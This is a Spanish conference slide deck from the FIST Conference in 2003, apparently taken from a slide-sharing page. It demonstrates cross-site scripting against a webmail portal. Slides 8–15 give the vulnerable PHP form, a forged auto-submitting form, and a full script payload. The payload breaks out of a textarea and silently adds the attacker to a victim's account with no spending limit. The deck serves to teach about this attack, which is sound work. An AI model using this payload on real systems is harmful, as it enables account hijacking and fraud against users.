Exploiting Web Applications XSS
•Descargar como PPT, PDF•
0 recomendaciones•369 vistas
Recomendados
Más contenido relacionado
Similar a Exploiting Web Applications XSS
Similar a Exploiting Web Applications XSS (15)
Más de Conferencias FIST
Más de Conferencias FIST (20)
Último
Último (20)
Exploiting Web Applications XSS
- 1. FIST Conference October 2003 @ Cross-site scripting © Rafael San Miguel Carrasco
- 2. XSS Portal exclusivo para clientes de SMC: webmail grupos de usuarios (1 cuenta, múltiples usuarios) compra de entradas, discos, libros, videojuegos, etc. © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 2
- 3. XSS Autenticación: Basada en login/password, al inicio de cada sesión. En adelante, una cookie que se utiliza como credencial para todos los recursos del portal. © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 3
- 4. XSS 2 vulnerabilidades: el webmail es vulnerable a XSS (al leer un mensaje con contenido malicioso) es posible automatizar el proceso de inclusión de un nuevo usuario a nuestra cuenta © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 4
- 5. XSS Añadir a un usuario a mi lista: © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 5
- 6. XSS © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 6
- 7. XSS © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 7
- 8. XSS HTML form en datosusuario.php: (qué se envía a confirma.php) echo "<form action=confirma.php method=post>"; echo "<p>Su nombre: <b>Rafael San Miguel Carrasco</b><br>"; echo "<input type=hidden name=nombre value=Rafael San Miguel>"; echo "Usuario que desea añadir: <b>$duser</b><br>"; echo "<input type=hidden name=nuevo value='$duser'>"; echo "Cuenta asociada a la línea: <b>91 466 56 89</b></p>"; echo "<input type=hidden name=linea value=91 466 56 89>"; <p>Limite de consumo: <select name="limite"> <option value="">Seleccione una cantidad <option value="100">100 euros <option value="200">200 euros <option value="500">500 euros <option value="0">Sin límite </select><p> © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 8
- 9. XSS Utilizando form reloading: <form action=http://127.0.0.1/confirma.php method=post> <input type=hidden name=nombre value=Rafael San Miguel Carrasco> <input type=hidden name=nuevo value='Julia Villanueva'> <input type=hidden name=linea value=91 466 56 89> <input type=hidden name=limite value=0> <input type=submit value=enviar> </form> Luego es posible reducir los tres pasos de procedimiento original a un solo paso. © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 9
- 10. XSS Comprobamos que es vulnerable a XSS: © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 10
- 11. XSS Inicialmente, parece que no: © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 11
- 12. XSS Cerramos </textarea>, ahora sí: © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 12
- 13. XSS Insertamos el form anterior, con algunos cambios: el código se carga en otra ventana el envío del formulario es automático se intenta ocultar la ventana (dimensión mínima, localización más alla de los límites de la pantalla © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 13
- 14. XSS Por lo tanto: 1. El usuario víctima recibe el e-mail 2. Al abrirlo, se ejecuta el código del formulario en otra ventana, sin que éste lo advierta 3. El envío del formulario supone mi inclusión en la lista de usuarios de la víctima © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 14
- 15. XSS Éste es el formulario modificado: </textarea><script>v = window.open (<parametros de localizacion y tamaño>); v.document.write ('<body><form name=f action=http://127.0.0.1/confirma.php method=post>'); v.document.write ('<input type=hidden name=nombre value=víctima>'); v.document.write ('<input type=hidden name=nuevo value=nuestro nombre>'); v.document.write ('<input type=hidden name=linea value=teléfono de la víctima>'); v.document.write ('<input type=hidden name=limite value=0>'); v.document.write ('<img src=bla.jpg onError=document.f.submit ()></form> </body>'); v.close (); </script> © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 15
- 16. Herramientas de detección de vulnerabilidades <script> function openBrWindow(theURL,winName,features) { window.open(theURL,winName,features); } </script> <a href="#" onClick="openBrWindow('bla.html','','');"> <img src="bla.jpg"></a> © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 16
- 17. Cross-site scripting FIST Conference October 2003 © Rafael San Miguel Carrasco Madrid, 25 October 2003
Notas del editor
- Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
- Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
- Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
- Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
- Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
- Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
- Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
- Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
- Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
- Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
- Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
- Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
- Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.